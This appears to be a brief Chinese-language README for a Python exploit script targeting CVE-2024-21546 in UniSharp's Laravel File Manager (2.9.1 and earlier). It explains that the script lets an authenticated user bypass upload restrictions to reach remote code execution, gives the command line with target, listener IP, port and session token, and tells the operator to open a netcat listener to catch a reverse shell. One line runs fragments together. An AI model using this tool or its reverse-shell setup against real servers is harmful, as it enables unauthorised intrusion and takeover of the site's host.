该Python漏洞利用脚本针对由UniSharp创建的存在漏洞的Laravel文件管理器,允许认证用户绕过文件限制并上传恶意文件。当上传的有效负载被触发时,可能导致远程代码执行(RCE)。
该漏洞利用执行以下操作:
laravel_session_token2.9.1及更早版本
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
重要:在运行脚本之前启动你的监听器:
nc -lvnp <listener_port>
